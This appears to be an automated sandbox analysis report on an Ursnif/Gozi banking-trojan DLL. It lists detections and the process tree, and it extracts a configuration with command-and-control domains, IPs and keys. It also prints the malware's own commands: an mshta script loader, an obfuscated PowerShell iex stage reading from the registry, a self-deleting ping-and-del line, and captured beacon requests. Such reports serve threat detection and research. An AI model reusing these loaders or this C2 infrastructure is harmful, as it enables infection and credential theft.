Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
626a983c091a8.tiff.dll

Overview

General Information

Sample Name:626a983c091a8.tiff.dll
Analysis ID:617384
MD5:388aa15c4d1a96534e7ca5587942fa0a
SHA1:a88e07643c07c8f75845c82c19cd928355d441b2
SHA256:abc6dfca9ad106cf41da3b6309a15e2a761991d2fad41662211b1afb1c2b0973
Tags:dllgozi_ifsbursnif3000
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3332 cmdline: loaddll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 2012 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4956 cmdline: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 6312 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6648 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6756 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6792 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6244 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6096 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.rundll32.exe.2ca0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.49494a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.49494a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.4f0a4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.4f0a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6312, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6312, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6476, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2012, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, ProcessId: 4956, ProcessName: rundll32.exe
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6312, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6476, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6476, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline, ProcessId: 6648, ProcessName: csc.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6476, TargetFilename: C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6312, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6476, ProcessName: powershell.exe
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132956272794820055.6476.DefaultAppDomain.powershell
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6476, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6488, ProcessName: conhost.exe

                      Snort Signatures

                      Timestamp:04/28/22-15:47:50.266267 04/28/22-15:47:50.266267
                      SID:2033203
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/28/22-15:47:52.636763 04/28/22-15:47:52.636763
                      SID:2033203
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/28/22-15:47:51.337694 04/28/22-15:47:51.337694
                      SID:2033203
                      Source Port:49759
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Machine Learning detection for sample
                      Source: 626a983c091a8.tiff.dllJoe Sandbox ML: detected
                      Source: 626a983c091a8.tiff.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a983c091a8.tiff.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059365C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_059365C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_059399BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_059399BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0594BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0594BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0593FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0593FD47

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.140.115.8 80Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49759 -> 94.140.115.8:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49759 -> 94.140.115.8:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: NANO-ASLV NANO-ASLV
                      Source: global trafficHTTP traffic detected: GET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.140.115.8Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.140.115.8
